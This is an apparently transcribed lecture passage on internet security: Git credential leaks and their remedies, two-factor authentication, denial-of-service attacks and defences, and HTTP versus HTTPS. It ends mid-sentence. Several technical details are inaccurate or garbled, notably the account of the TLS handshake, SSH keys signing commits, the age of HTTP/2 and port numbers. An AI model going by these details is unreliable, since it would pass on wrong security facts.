DOUG LLOYD: Now that we know a bit more
about the internet and how it works,
let's reintroduce the subject of
security with this new context.
And let's start by talking
about Git and GitHub.
Recall that Git and GitHub
are a technology that
are used by programmers
to version control
their software, which basically
allows them the ability
to save code to an internet-based
repository in case of some failure
locally, they have a backup
place to put it, but also
keep track of all the
changes they've made
and possibly go back in
time in case they produce
a version of code that is broken.
GitHub has some great
advantages, but it also
has the potential disadvantages
because of this structure
of being able to go back in time.
So for example, imagine that what we
have is an initial commit, and commit
is just GitHub parlance
for a set of code
that you are sending to the internet.
So I've decided to take file A, file B,
and file C in their current versions.
I've saved them using control S or
command S literally on my machine,
and I want to send those
versions to GitHub to be
stored permanently or semi-permanently.
You would package those up
in what's called a commit
and then push that code to GitHub
where it would then be visible online.
And this would be packaged as a commit.
And all the files that we view on
GitHub are tracked in terms of commits.
And commits chain together.
And we've seen this idea of
chaining in the past when we've
discussed linked lists, for example.
So every commit knows about the
one that comes after it once
that commit is eventually pushed as well
as all of the ones that preceded it.
So imagine we have an initial
comment where we post some code
and then we write some more--
we make some more changes.
We perhaps update our
database in such a way
where when we post or push-- excuse
me-- our second commit to GitHub,
we accidentally expose
the database credentials.
So perhaps someone
inadvertently typed the password
for how to access the database into
some Python code that would then
be used to access that database.
That's not a good thing.
And maybe somebody quickly realized
it and said, you know what?
We need to get this off of GitHub.
It is a source repository.
It's available online.
And so they push a third commit to
GitHub that deletes those credentials.
It stores them somewhere else that's not
going to be saved on this repository.
But have we actually solved the problem?
And you can probably
imagine that the answer
is no, because we have this
idea of version control
where every past iteration
of all of these files
is stored still on GitHub such that, if
I needed to, I could go back in time.
So even though I attempted to
solve the security crisis I just
created for myself by
introducing a new commit that
removes the credentials
from those files such that,
if I'm looking just at the most
recent version of the files,
I don't see it anymore.
I still have the ability
to go back in time,
so this doesn't actually
solve a problem.
See, one of the interesting
things about GitHub
is the model that is used for it.
At the very beginning
of GitHub's existence,
it relied pretty extensively on
this idea of you sign up for free,
you get a free account
for GitHub, and you
have a limited number of private
repositories, repositories that are not
publicly viewable or searchable, and
you could pay to have more of them
if you wanted to.
But the majority of your
repositories, assuming
you did not opt into a paid
account, were free, which
meant anybody on the internet could
search them using GitHub's search tool,
or using even a regular
search engine such as Google,
could just look for something.
And if your GitHub repositories happen
to match what that person searched
or specifically, if you're looking
within GitHub search feature,
if a user is looking for
specific lines of code,
anything in a public
repository, it is available.
Now, GitHub has recently
changed to a model where
there are more private repo--
or there's a higher limit
on the number of private repositories
that somebody could have.
But this was part of Github's
design to really encourage
developers and programmers to sort of
create this open source community where
anybody could view someone else's
code, and in GitHub parlance,
fork their code, which basically
means to take their entire repository
or collection of files and copy it
into their own GitHub repository
to perhaps make changes
or suggest changes,
pushing those back into the
code base with the idea being
that it would make the
entire community better.
A side effect, of
course, is that items get
revealed when we do so because of this
public repository setup we have here.
So GitHub is great in terms
of its ability for programmers
to refer to materials on the internet.
They don't have to rely on their
own local machines to store code.
It allows people to work
from multiple workstations,
similar to how Dropbox or
Google Drive, for example,
might allow you to access
files from different machines.
You don't have to be on a
specific machine to access a file,
as we used to have to do before
these cloud-based document storage
services existed.
And it encourages collaboration.
For example, if you and I were to
collaborate on a GitHub repository,
I could push changes to that
repository that you could then pull.
And we could then be working
off of the same code base again.
We sort of have this central repo--
central area where we share
our code with one another.
And we can each
individually make changes
and incorporate one another's
changes into the final products.
So we're always working off
of the same base of material.
The side effect, though,
again, is this material
is generally public unless you have
opted into a private repository where
you have specific
individuals who are logged
in with their GitHub
accounts who want to share.
So is there a way to solve
this problem, though, of we
accidentally expose our
credentials in a public repository?
Of course, if we're in
a private repository,
this might not be as alarming.
It's still probably not something you--
it should be encouraged
to have credentials
for anything stored anywhere, whether
public or private, on the internet.
It's a little riskier.
But is there a way to get rid of this or
to prevent this problem from happening?
And fortunately, there are a
number of different safeguards
specific to Git and
GitHub that we can use
to prevent the accidental leakage
of information, so to speak.
So for example, one way we can handle
this is using a program or utility
called GitSecrets.
GitSecrets works by looking for
what's called a regular expression.
And a regular expression is
computer science parlance
for a particular formation of
a string, so a certain number
of characters, a certain number of
digit characters, maybe some punctuation
marks.
You can say, I'm looking for
strings that match this idea.
And you can express this idea
where this idea is all capital
letters, all lowercase letters, this
many numbers, and this many punctuation
marks, and so on using this tool
called a regular expression.
But GitSecrets contains a list
of these regular expressions
and will warn you when you are
about to make a commit, when you're
about to push code or send
code to GitHub to be stored
in its online repository that you have
a string that matches this pattern
that you wanted me to warn you about.
And so be sure before
you commit this code
and push this code that you
actually intend to send this up
to GitHub, because it may be that this
matches a password string that you're
trying to avoid.
So that's an interesting tool
that can be used for that.
You also want to consider
limiting third party app access.
GitHub accounts are actually very
common to use as other forms of login,
for example.
So there's a platform
on the internet called
OAuth which allows you to use,
for example, your Facebook
account or your Google account
to log into other services.
Perhaps you've encountered this
in your own experience working
with different services on the internet.
Instead of creating a login for site x,
you could use your Facebook or Google
login, or, in many instances as
well, your GitHub log in to do so.
When you do so, though, you are
allowing that third party application,
someone that's not GitHub, the ability
to use and access your GitHub identity
or credential.
And so you should be very careful with
not only GitHub but other services
as well, thinking about whether you
want that other service to have access
to your GitHub, or Facebook, or Google
account information to use it even just
for authentication.
It's a good idea to try and
limit how much third party app
access you're giving to other services.
Another tool is to use
something called a commit hook.
Now, commit hook is just a
fancy term for a short program
or set of instructions that executes
when a commit is pushed to GitHub.
So for example, many
of the course websites
that we use here at Harvard
for CS50 are GitHub-based,
which means that when we want to change
the content on the course website,
we update some HTML, or Python,
or JavaScript files, we push those
to GitHub, and that triggers a commit
hook where basically that commit
hook copies those files
into our web server,
runs some tests on them to make
sure that there's no errors in them.
For example, if we wrote some
JavaScript or Python that was breaking,
it had a bug in it, we'd rather
not deploy that bug so to speak.
We wouldn't want the
broken version of the code
to replace the currently
working website.
And so commit hook can be
used to do testing as well.
And then once all the
tests pass, we then
are able to activate those
files on the web server
and the changes have happened.
So we're using GitHub
to store the changes
that we want to make on our
site, the HTML, the Python,
the JavaScript changes
that we want to make.
And then we're using this commit
hook, a set of instructions,
to copy them over and actually
deploy those changes to the website
once we've verified that we
haven't made anything break.
You can also use commit hooks, for
example, to check for passwords
and have it warn you if you have
perhaps leaked a credential.
And then you can undo
that with a technique
that we'll see in just a moment.
Another thing that you can do when
using GitHub to protect or verify
your identity is to use an SSH key.
SSH keys are a special form
of a public and private key.
In this case, it's really not
used for encryption, though.
It's actually used as identification.
And so this idea of
digital signatures, which
you may recall from a few lectures
ago, comes back into play.
Whenever I use an SSH key to push
my code to GitHub, what happens
is I also digitally sign the
commit when I send it up.
And so before that commit
gets posted to GitHub,
GitHub verifies this by
checking my public key
and verifying, using the mathematics
that we've seen in the past,
that, yes, only Doug
could have sent this to me
because only Doug's public key will
unscramble this set of zeros and ones
that I received that only could have
then been created by his private key.
These two things are
reciprocal of one another.
So we can use SSH keys
and digital signatures
as an identity verification
scheme as well for GitHub
as we might be able to for
mailing documents, or sending
documents, or something like that.
Now, imagine we have posted
the credentials accidentally.
Is there a way to get rid of them?
GitHub does track our entire history.
But what if we do make a mistake?
Human beings are fallible.
And so there is a way to
actually eliminate the history.
And that is using a
command called Git Rebase.
So let's go back to the illustration
we had a moment ago where
we have several different commits.
And I've added a fourth commit here
just for purposes of illustration.
So our first commit
and our second commit,
and then it's after that that we
expose the credentials accidentally,
and then we have a fourth commit where
we actually delete that mistake that we
had previously made.
When we want to Git
Rebase, the idea is we want
to delete a portion of the history.
Now, deleting a portion
of the history has
a side effect of any changes
that I made here or here.
In this illustration, we're going
to get rid of the last two commits.
Any changes that I've made besides
accidentally exposing the credentials
are also going to be destroyed.
And so it's going to be incumbent
on us to make sure to copy and save
the changes we actually want to preserve
in case we've done more than just
expose the credentials.
And then we'll have to make a
new commit in this new history
we create so that we can still preserve
those changes that we want to make.
But let's say, other
than the credentials,
I didn't actually do anything else.
One thing I could do is rebase or
set as a new start point, basically,
this second commit as
the end of the chain.
So instead of going all the way to here
and having that preserved ad infinitum,
I want to just get rid of everything
from the second commit forward.
And I can do that.
And then those commits are no
longer remembered by GitHub.
And as soon as the next
commit I have would go here,
right after second commit as opposed
to imagining a fifth one there
right after credentials
being removed, those commits
are, for all intents and
purposes on GitHub, forgotten.
And finally, one more thing
that we can do when using GitHub
is to mandate the use of
two-factor authentication.
Recall we've discussed two-factor
authentication a little bit previously.
And the idea is that you
have a backup mechanism
to prevent unauthorized login.
And the two factors in
two-factor authentication
are not two passwords, because those
are fundamentally quite similar.
The idea is that you want to have
something that you know, for example,
a password-- that's usually very
commonly one of the two factors
in two-factor authentication--
and something that you
have, the thought being
that an adversary is incredibly unlikely
to have both things at the same time.
They may know your
password, but they probably
don't have your cell phone,
for example, or your RSA key.
They may have stolen your phone or
they may have stolen your RSA key,
but they probably don't
also know your password.
And so the idea is that this provides
an additional level of defense
against potential hacking,
or breaking into accounts,
or unauthorized behavior in
accounts that you obviously
don't want to happen.
Now, an RSA key, if you're unfamiliar,
is something that looks like this.
There's different versions of them.
They've sort of evolved over time.
This one is actually a
combined RSA key and USB drive.
And inside the window
here of the RSA key
is a six digit number that just
changes every 60 seconds or so.
So when you are given one
of these, for example,
perhaps at a firm or a business,
it is assigned to you specifically.
There's a server that
your IT team will have
setup that maps the serial number
on the back of this RSA key
to your employee ID, for example.
But they otherwise don't know what the
number currently on the RSA key is.
They only know who owns it, who is
physically in possession of it, which
employee ID it maps do.
And every 60 seconds
it changes according
to some mathematical algorithm that
is built into the key that generates
numbers in a pseudo random way.
And after 60 seconds, that code
will change into something else.
And you'll need to actually have
the key on you to complete a login.
If an RSA key is being
used to secure such
that you need to enter a
password and your RSA key value,
you would need to have both.
No other employee RSA key--
well, hypothetically, I
guess there's a one in
a million chance that it
would happen to be randomly showing
the same number at the same time.
But no other employee's RSA
key could be used to log in.
Only yours could be used to log in.
Now, there are several
different tools out there
that can be used to provide
two-factor authentication services.
And there's really no technical
reason not to use these services.
You'll find them as applications
on cell phones, most likely.
And you'll find ones like this, Google
Authenticator, Authy, Duo Mobile.
There are lots of others.
And if you don't want to use one
of those applications specifically,
many services also just allow
you to receive a text message
from the service itself.
And you'll just get that
via SMS on your phone,
so still on your phone, just not
tied to a specific application.
And while there's no technical reason
to avoid two-factor authentication,
there is sort of this
social friction surrounding
two-factor authentication in that human
beings tend to find it annoying, right?
It used to be username,
password, you're logged in.
It's pretty quick.
Now it's username, password, you
get brought to another screen,
you're asked to enter a six-digit code,
or maybe in some advanced applications
you get a push notification sent to
your device that you have to unlock
and then hit OK on the device.
And people just find that inconvenient.
We haven't yet reached
this point culturally
where two-factor
authentication is the norm.
And so it's sort of a linchpin
when we talk about security
in the internet context, is human
beings being the limiting factor
for how secure we can be.
We have the technology to take
steps to protect ourselves,
but we don't feel compelled to do so.
And we'll see this pattern reemerge
in a few other places today.
But just know that that
is why perhaps you're
not seeing so much adoption
of two-factor authentication.
It's not that it's technically
infeasible to do so.
It's just that we just
find it annoying to do so,
and so we don't adopt it as
aggressively as perhaps we should.
Now let's discuss the
type of attack that
occurs on the internet with
unfortunate regularity,
and that is the idea of a
denial of service attack.
Now, the idea behind
these attacks is basically
to cripple the
infrastructure of a website.
Now, the reason for
this might be financial.
You want to try and sabotage somebody.
There might be other motivations,
distraction, for example,
by tying up their resources,
trying to stop the attack.
It opens up another avenue
to do something else,
to perhaps steal information.
There's many different
motivations for why they do this.
And some of them are
honestly just boredom or fun.
Amateur hackers sometimes
think it's fun to just initiate
a denial of service attack
against an entity that
is not prepared to handle it.
Now, in the associated
materials for this course,
we provided an article called Making
Cyberspace Safe for Democracy, which
we really do encourage you
to take a look at, read,
and discuss with your group.
But I also want to take a
little bit of time right
now just to talk about
this article in particular
and draw your attention
to some areas of concern
or some areas that might
lead to more discussion.
Now, the biggest of
these is these attacks
tend not to be taken very seriously
by people when they hear about them.
You'll occasionally hear about
these attacks in the news,
denial of service
attacks, or their cousin,
distributed denial of service attacks.
But culturally, again,
us being humans and sort
of neglecting some of the
real security concerns here,
we don't think of it as an attack.
And that's maybe because of how we
hear about other kinds of attacks
on the news that seem more
physically devastating,
that have more real consequences.
And it makes it hard to have a serious
conversation about cyber attacks
because there's this friction that we
face trying to get people to understand
that these are meaningful and real.
And in particular, these
attacks are kind of insidious.
They're really easy to execute
without much difficulty at all,
especially against a small business
that might be running its own server as
opposed to relying on a cloud service.
A pretty top-of-the-line, commercially
available machine might be able
to execute a denial of service
or DoS attack on its own.
It doesn't even require
exceptional resources.
Now, when we start to attack mid-sized
companies, or larger companies
or entities, one single computer
from one single IP address
is not typically going to be enough.
And so instead, you would have a
distributed denial of service attack.
In a distributed denial
of service attack,
there is still generally one core
hacker, or one collective group
of hackers or adversaries
that are trying
to penetrate some company's defenses.
But they can't do it
with their own machine.
And so what they do is create
something called a botnet.
Perhaps you've heard this term before.
A botnet basically
happens, or is created,
when hackers or adversaries
distribute worms or viruses sort of
surreptitiously.
Perhaps they packaged
them into some download.
People don't notice anything
about the worm or anything
about this program that has been
covertly installed on their machine.
It doesn't do anything in
particular until it is activated.
And then it becomes
an agent or a zombie--
sometimes you'll hear
it termed that as well--
controlled by the hackers.
And so all of a sudden
the adversaries gain
control of many different
devices, hundreds or thousands
or tens of thousands, or even
more in some of the bigger attacks
that have happened, basically
turning these computers--
rendering all of them
under their control
and being able to direct them to
take whatever action they want.
And in particular, in the case of a
distributed denial of service attack,
all of these computers are
going to make web requests
to the same server or same
website, because that's the idea.
You have so many requests.
With distributed denial
of service attacks
or just regular denial of service
attacks, it's just a question of scale,
really.
We're hitting those servers
with so many web requests.
I want to access this.
I want to access this, hundreds,
thousands, tens of thousands
of these requests a second such that
the computer can't possibly-- the server
can't possibly field
all of these inquiries
that are coming and trying to give these
requests the data they're asking for.
Ultimately, that would
eventually, after enough time,
result in the server just crashing,
throwing up its hands and saying,
I don't know what to do.
I can't possibly process
all of these requests.
But by tying it up in
this way, the adversary
has succeeded in damaging the
infrastructure of the server.
It's either denied the server
the ability to process customers
and payments or it's just
taken down the entire website
so there's no information available
about the company anymore to anybody
who's trying to look it up.
These attacks are actually
really, really common.
There are some surveys
that have been out that
assess that roughly one sixth to one
third of average-sized businesses that
are part of this tech survey
that goes out every year
suffer some sort of DoS attack in
a given year, so 16% to 35% or so
of business, which is a lot of
businesses when you think about it.
And these attacks are
usually quite small,
and they're certainly not newsworthy.
They might last a few minutes.
They might last a few hours.
But they're enough to be disruptive.
They're certainly noteworthy.
And they're something to
avoid if it's possible.
Cloud computing has made
this problem kind of worse.
And the reason for this is that,
in a cloud computing context,
your server that is
running your business
is not physically
located on your premises.
It was often the case that when
a business would run a website
or would run their business, they
would have a server room that
had the software that was
necessary to run their website
or to run whatever software-based
services they provided.
And it was all local to that business.
No one else could possibly be affected.
But in a cloud computing
context, we are generally
renting server space and server power
from an entity such as Amazon Web
Services, or Google Cloud Services,
or some other large provider where
it might be that 10, 20, 50, depending
on the size of the business in question
here--
multiple businesses are sharing
the same physical resources,
and they're sharing
the same server space,
such that if any one
of those 50, let's say,
businesses is targeted
by hackers or adversaries
for a denial of service attack, that
might actually, as collateral damage,
take out the other 49 businesses.
They weren't even part of the attack.
But cloud computing is--
we've heard about it
as it's a great thing.
It allows us to scale
out our websites, make it
so that we can handle more customers.
It takes away the problem of
security, web-based security,
because we're outsourcing that to the
cloud provider to give that to us.
But it now introduces this new problem
of, if we're all sharing the resources
and any one of us gets
attacked, then all of us
lose the ability to access
those resources and use them,
which might cause all of
our organizations to suffer
the consequences of one single attack.
This collateral damage
can get even worse
when you think about servers that are--
or businesses whose service
is providing the internet, OK?
So a very common example of
this, or a noteworthy example
of this, happened in 2016
with a service called
DYN, D-Y-N. DYN is a
DNS service provider,
DNS being the domain name system.
And the idea there is to map the things
like www.google.com to its IP address.
Because in order to actually
access anything on the internet
or to have a communication with anyone,
you need to know their IP address.
And as human beings, we tend
not to actually remember
what some website's IP address is, much
like we may not recall a certain phone
number.
But if it has a mnemonic
attached to it-- so for example,
you know back in the day we had
1-800-COLLECT for collect calls.
If you forgot the number, the
literal digits of that phone number,
you could still remember the idea of
it because you had this mnemonic device
to help remind you.
Domain names, www.whatever.com,
are just mnemonic devices
that we use to refer to an IP address.
And DNS servers provide
this service to us.
DYN is one of the major DNS
providers for the internet overall.
And if a denial of service
attack, or in this case
it was certainly a distributed denial of
service attack because it was enormous,
goes after pinging the IP address
or hitting that server over
and over and over, then it is unable
to field requests from anyone else,
because it's just getting pummeled by
all of these requests from some botnet
that some adversary or collective
of adversaries has taken control of.
This, the collateral
damage, is no one can ever
map a domain name to
an IP address, which
means no one can visit
any of these websites
unless you happen to know at the
outset what the IP address of any given
website was.
If you knew the IP address,
this wasn't a problem.
You could just still directly
go to that IP address.
That's not the kind of attack here.
But the attack instead
tied up the ability
to translate these mnemonic
names into numbers.
And as you can see,
DYN was a DNS-- or is
a DNS provider for much of the
eastern half of the United States
as well as the Pacific
Northwest and California.
And if you think about
what kinds of businesses
are headquartered in
the Pacific Northwest
and in California and in the
New York area, for example,
you probably see that some
major, major services,
including GitHub, which we've
already talked about today,
but also Facebook and others--
Harvard University's website was
also taken down for several hours.
This attack lasted about 10
hours, so quite prolonged.
It really did a lot
of damage on that day.
It really crippled the ability
of people to use the internet
for a long period of time,
so kind of very interesting.
This article also talks a bit about
how the United States government has
decided to-- or legislature--
handle these kinds of issues,
computer-based attacks.
It takes take a look at the
Computer Fraud and Abuse
Act, which is codified at 18 USC 1030.
And this is really the only computer
crimes, general computer crimes,
law that is on the books
and talks about what
it means to be a protected computer.
And you'll be interested to know
perhaps that any computer pretty much is
a protected computer.
The law specifically calls out
government computers as well as
any computer that may be
involved in interstate commerce,
which is you can imagine
anybody who uses the internet,
their computer then falls
under the ambit of this act.
So it's another interesting
thing to take a look
at if you're interested in how we
deal with processing or prosecuting
violations of computer-based crimes.
All of it is actually sort of dealt
with in the Computer Fraud and Abuse
Act, which is not terribly long
and hasn't been updated extensively
since the 1980s other than
some small amendments.
So it's kind of interesting
that we have not yet
gotten to the point where we
are defining and prosecuting
specific types of computer crime,
even though we've begun to figure out
different types of computer crimes,
such as DoS attacks, such as phishing,
and so on.
Now, hypothetically, a simple
denial of service attack
should be pretty easy to stop.
And the reason for that is that there's
only one person making the attack.
All requests, recall, that happen
over the internet happen via HTTP.
And HTTP requires that
the sender's IP address
be part of that envelope
that gets sent over,
such that the server who wants to
respond to the client, or the sender,
can just reference.
It's the return address.
You need to be able to know
where to send the data back to.
And so any request that is coming from--
there are thousands
of requests that might
be coming from a single IP address.
If you see that happening, you can
just decide as a server in the software
to stop accepting requests
from that address.
DDoS attacks, distributed
denial of service attacks,
are much harder to stop.
And it's exactly because of the fact
that there is not a single source.
If there's a single source,
again, we would just completely
stop accepting any requests of
any type from that computer.
However, because we have so many
different computers to contend with,
the options to handle this
are a bit more limited.
There are some techniques for
averting them or stopping them
once they are detected, however,
the first of which is firewalling.
So the idea of a firewall
is we are only going
to allow requests of a certain type.
We're going to allow
them from any IP address,
but we're only going to
accept them into this port.
Recall that TCPIP gives us the
ability to say this service
comes in via this port, so HTTP
requests come in by a port 80.
HTTPS requests come in via port 443.
So imagine a distributed
denial of service attack
where typically the site would expect
to be receiving requests on HTTPS.
It generally only uses
secured HTTP in order
to process whatever
requests are coming in.
So it's expecting to receive
a lot of traffic on port 443.
And then all of a sudden a
distributed denial of service attack
begins and it's receiving
lots of requests on port 80.
One way to stop that attack before
it starts to tie up resources
is to just put a
firewall up and say, I'm
not actually going to accept
any requests on port 80.
And this may have a side effect of
denying certain legitimate requests
from getting through.
But since the vast majority of the
traffic that I receive on the site
comes in via HTTPS on port 443,
that's a small price to pay.
I'd rather just allow the
legitimate requests to come in.
So that's one technique.
Another technique is
something called sinkholing.
And it's exactly what
you probably think it is.
So a sinkhole, as you
probably know, is a hole
in the ground that
swallows everything up.
And a sink hole in digital context is
a big black hole, basically, for data.
It's just going to swallow
up every single request
and just not allow any of them out.
So this would, again, stop
the denial of service attack
because it's just
taking all the requests
and basically throwing
them in the trash.
This won't take down the website of
the company that's being attacked,
so that's a good thing.
But it's also not going to allow
any legitimate traffic of any type
through, so that might be a bad thing.
But depending on the
length of the attack, if it
seems like it's going to be
short, if the requests trickle off
and stop because the attackers
realize, we're not making any progress,
we're not actually doing--
we're not getting the results
that we had hoped for,
then perhaps they would give up.
Then the sinkhole could be
stopped and regular traffic
could start to flow through again.
So a sinkhole is basically just
take all the traffic that comes in
and just throw it in the trash.
And then finally, another
technique we could use
is something called packet analysis.
So again, HTTP we know
is requests via the web.
And we learned a little
bit that we have headers
that are packaged alongside
those HTTP packets
where the request originated
from, where it's going to.
There's a whole lot of
other metadata as well.
You'll know, for example, what type
of browser the individual is using
and what operating system
perhaps they are using
and where, as in sort of a
geographical generalization, are they.
Are they in the US Northeast?
Are they in South America and so on?
Instead of deciding to restrict
traffic via specific ports
or just restrict all traffic, we could
still allow all traffic to come in
but inspect all of the
packets as they come in.
So for example, perhaps most
of the traffic on our site we
are expecting to come from the--
just because I used
that example already--
US Northeast.
And then all of a sudden
we are experiencing
tons of packets coming in that have IP
addresses that all seem to be based--
or they have, as part of
their packets, information
that says that they're
from South America,
or they're from the US West Coast, or
somewhere else that we don't expect.
We can decide, after taking
a quick look at that packet
and analyzing those individual
headers, that I'm not
going to accept any
packets from that location.
The ones that match locations
I'm expecting, I'll let through.
And this, again, might prevent certain
customers from getting through,
certain legitimate customers who might
actually be based in South America
from getting through.
But in general, it's going to
block most of the damaging traffic.
DDoS attacks are really
frustrating for companies
because they really
can do a lot of damage.
Usually the resources of the
company will eventually-- especially
if they're cloud-based and they rely
on their cloud provider to help them
scale up, usually the resources
of the company being attacked
are enough to eventually
overwhelm and stop
the attacker who usually has a
much more limited set of resources.
But again, depending on the type of
business being attacked in this way--
again, think of the example
of DYN, the DNS provider.
The ramifications for
one of these attacks
can be really quite severe and
really quite annoying and costly
for a business that suffers it.
So we just talked about
HTTP and HTTPSS a moment ago
when we were talking about
firewalling, allowing
some traffic on some of the
ports but not other ports,
so maybe allowing HTTP
traffic but not HTTPS traffic.
Let's take a look at these two
technologies in a bit more detail.
So HTTP, again, is the
hypertext transfer protocol.
It is how hypertext or web pages
are transmitted over the internet.
If I am a client and I make a
request to you for some HTML content,
then you as a server would
send a response back to me,
and then I would be able to see
the page that I had requested.
And every HTTP request has a specific
format at the beginning of it.
For example, we might see something
like this, GET /execed HTTP/1.1, host:
law.harvard.edu.
Let's just quickly pick these
apart again one more time.
If you see GET at the
beginning of an HTTP request,
it means please fetch or get
for me, literally, this page.
The page I'm requesting
specifically is /execed.
And the host that I'm asking it from
is, in this case, law.harvard.edu.
So basically what I'm saying
here is please fetch for me,
or retreat from me, the
HTML content that comprises
http://law.harvard.edu/execed.
And specifically I'm doing this
using HTTP protocol version 1.1.
We're still using
version 1.1 even though I
believe version 2.0 was defined
almost 20 years ago now probably.
And basically this is just
HTTP's way of identifying
how you're asking the question.
So it's similar to me making a
request and saying, oh, by the way,
the rest of this request is written
in French, or, oh, by the way,
the rest of this request
is written in Spanish.
It's more like here are
the parameters that you
should expect to see
because this request is
in version 1.1, which differed
non-trivially from version 1.0.
So it's just an identifier for how
exactly we are formatting our request.
But HTTP is not encrypted.
And so if we think about
making a request to a server,
if we're the client
on the left and we're
making a request to a server on the
right, it might go something like this.
Because the odds are pretty low
that, if we're making a request,
we are so close to the
server that would serve
that request to us that
it wouldn't need to hop
through any routers along the way.
Remember, routers,
their purpose in life is
to send traffic in the right direction.
And they contain a table
of information that says,
oh, if I'm making a request
to some server over there,
then the best path is to go here,
and then I'll send it over there,
and then it will send it there.
Their job is to optimize
and find the best path
to get the request to
where it needs to be.
So if I'm initiating a request
to, as the client, the server,
it's going to first go
through router A who's
going to say, OK, I'm going to
move it closer to the server
so that it receives that request,
goes to router B, goes to router C.
And eventually router C perhaps
is close enough to the server
that it can just hand
off the request directly.
The server's then going to get
that request, read it as HTTP/1.1,
look at all the other metadata inside of
the request to see if there's anything
else that it's being asked for, and
then it's going to send the information
back.
And in this example
I'm having it go back
exactly through the same chain
of routers but in reverse.
But in reality, that might be different.
It might not go through
the exact same three
routers in this example in reverse.
It might actually go from C to A to
B, back to A depending on traffic
that's happening on the network
and how congested things are
and whether there might be a new path
that is better in the amount of time
it took to process the
request that I asked for.
But remember, HTTP, not secured.
Not encrypted.
This is plain,
over-the-air communication.
We saw previously, when we
took a look at a screenshot
from a tool called
Wireshark, that it's not
that difficult on an unsecured network
using an unsecured protocol to read,
literally, the contents of
those packets going to and from.
So that's a vulnerability here for sure.
Another vulnerability is
any one of these computers
along the way could be compromised.
So for example, router
A perhaps was infected
by somebody who-- a router
is just a computer as well.
So perhaps it was
infected by an adversary
with some worm that will eventually
make it part of some botnet,
and it'll eventually start
spamming some server somewhere.
If router A is compromised in such a
way that an adversary can just read all
the traffic that flows
through it-- and again,
we're sending all of our traffic
in an unencrypted fashion--
then we have another security
loophole to deal with.
So HTTPS resolves this problem
by securing or encrypting
all of the communications
between a client and a server.
So HTTP requests go to one port.
We talked about that already.
They go to port 80 by convention.
HTTP requests go to port
for 443 by convention.
In order for HTTPS to
work, the server is
responsible for providing or possessing
a valid what's called an SSL or TLS
certificate.
SSL is actually a
deprecated technology now.
It's been subsumed into TLS.
But typically these things are still
referred to as SSL certificates.
And perhaps you've seen a
screen that looks like this when
you're trying to visit some website.
You get a warning that your
connection is not private.
And at the very end of
that warning, you are
informed that the cert date is invalid.
Basically this just means that
their SSL certificate has expired.
Now, what is an SSL certificate?
So there are services that work
alongside the internet called
certificate authorities.
And like GlobalSign, for example,
from whom I borrowed the screenshots--
GoDaddy, who is also a very
popular domain name provider,
is also a certificate authority.
And what they do is they verify
that a particular website owns
a particular private key--
or excuse me, a particular public key
which has a corresponding private key.
And the way they do
that is they digitally
sign something to the
certificate authority.
The certificate authority then goes
through those exact same checks
that we've seen before
for digital signatures
to verify that, yes, this
person must own this public key.
And the idea for this
is we're trusting that,
when I send a communication
to you as the website
owner using the public key that you
say is yours, then it really is yours.
There really is somebody out
there or some third party
that we've decided to collectively
trust, the certificate authority, who
is going to verify this.
Now, why does this matter?
Why do we need to verify that someone's
public key is what they say it is?
Well, it turns out that this
idea of asymmetric encryption,
or public and private key cryptography
that we've previously discussed,
does form part of the core of HTTPS.
But as we'll see in a moment, we don't
actually use public and private keys
to communicate except at the very,
very beginning of our interaction
with some site when we are using HTTPS.
So the way this really
happens underneath the hood
is via the secure sockets layer, SSL,
which is now known as the transport
layer security overall protocol.
There's other things that are folded
into it, but SSL is part of it.
And this is what happens.
When I am requesting a page from
you, and you are the server,
and I am requesting this
via HTTPS, I am going
to initially make a request using
the public key that I believe
is yours because the
certificate authority has
vouched for you, saying that I would
like to make a encrypted request.
And I don't want to send
that request over the air.
I don't want to send that in the clear.
I want to send it to you using the
encryption that you say is yours.
So I send a request to you,
encrypting it using your public key.
You receive the request.
You decrypt it using your private key.
You see, OK, I see now that Doug
wants to initiate a request with me,
and you're going to fulfill the request.
But you're also going
to do one other thing.
You're going to set a key.
And you're going to
send me back a key, not
your public or private key, a different
key, alongside the request that I made.
And you're going to send it
back to me using my public key.
So the initial volley of communications
back and forth between us
is the same as any other
encrypted communication
using public and private keys
that we've previously seen.
I send a message to you
using your public key.
You decrypt it using your private key.
You respond to me using my public key,
and I decrypt it using my private key.
But this is really slow.
If we're just having communications back
and forth via mail or even via text,
the difference of a few
milliseconds is immaterial.
We don't really notice it.
But on the web, we do
notice it, especially
if we're making multiple
requests or there's
multiple packets going back and
forth and every single one of them
needs to be encrypted.
So beyond this initial volley,
public and private key encryption
is no longer needed because it's no
longer used, because it's too slow.
We would notice it if we did.
Instead, as I mentioned, the server
is going to respond with a key.
And that key is the key to a cipher.
And we've talked about ciphers before
and we know that they are reversible.
The particular cipher in question
here is something called AES.
But it is just a cipher.
It is reversible.
And the key that you
receive is the key that you
are supposed to use to decrypt
all future communications.
This key is called the session key.
And you use it to decrypt
all future communications
and use it to encrypt all future
communications to the server
until the session,
so-called, is terminated.
And the session is basically
as long as you're on the site
and you haven't logged
out or closed the window.
That is the idea of a session.
It is one singular
experience with a page
or with a set of pages that are
all part of same domain name.
We're just going to use a cipher for
the rest of the time that we talk.
Now, this may seem
insecure for reasons we've
talked about when we
talked about ciphers
and how they are inherently flawed.
Recall that when we were talking about
some of the really early ciphers,
those are classic ciphers
like Caesar and Vigenere,
those are very easy to break.
AES is much more complex than that.
And the other upside is that
this key, like I mentioned,
is only good for a session.
So in the unlikely event that the server
chooses a bad key, for example, if we
think about it as if it was Caesar,
if they choose a key of zero,
which would be a very bad key, or
key of one that doesn't actually
shift the letters at all, even
if the key is compromised,
it's only good for a particular session.
That's not a very long amount of time.
But the upside is the
ability to encipher
and decipher information is much faster.
If it's reversible, it's pretty quick
to do some mathematical manipulation
and transform it into something
that looks obscured and gibberish
and to undo that as well.
And so even though public
and private keys are--
we consider effectively
unbreakable, like to the point
of it's mathematically untenable
to crack a message using
public and private key encryption.
We don't rely on it for SSL because
it is impractical to actually expect
communications to go that slowly.
And so we do fall back on these ciphers.
And that really is when you're using
secured encrypted communication
via HTTPS.
You're just relying
on a cipher that just
happens to be a very, very fancy
cipher that should hypothetically
be very difficult to figure
out the key to as well.
You may have also seen a few changes
in your browser, especially recently.
This screenshot shows
a couple of changes
that are designed to warn you when
you are not using HTTPS encryption.
And it's not necessary to use
HTTPS for every interaction you
have on the internet.
For example, if you are going to a
site that is purely informational,
it's just static content, it's just a
list of information, there's no login,
there's no buying, there's no clicking
on things that might then get tracked,
for example, it's not really
necessary to use HTTPS.
So don't be necessarily
alarmed if you visit a site
and your warned it's not secure.
We're told that over time this will
turn red and become perhaps even
more concerning as more
versions of this come out
and as more and more adopters
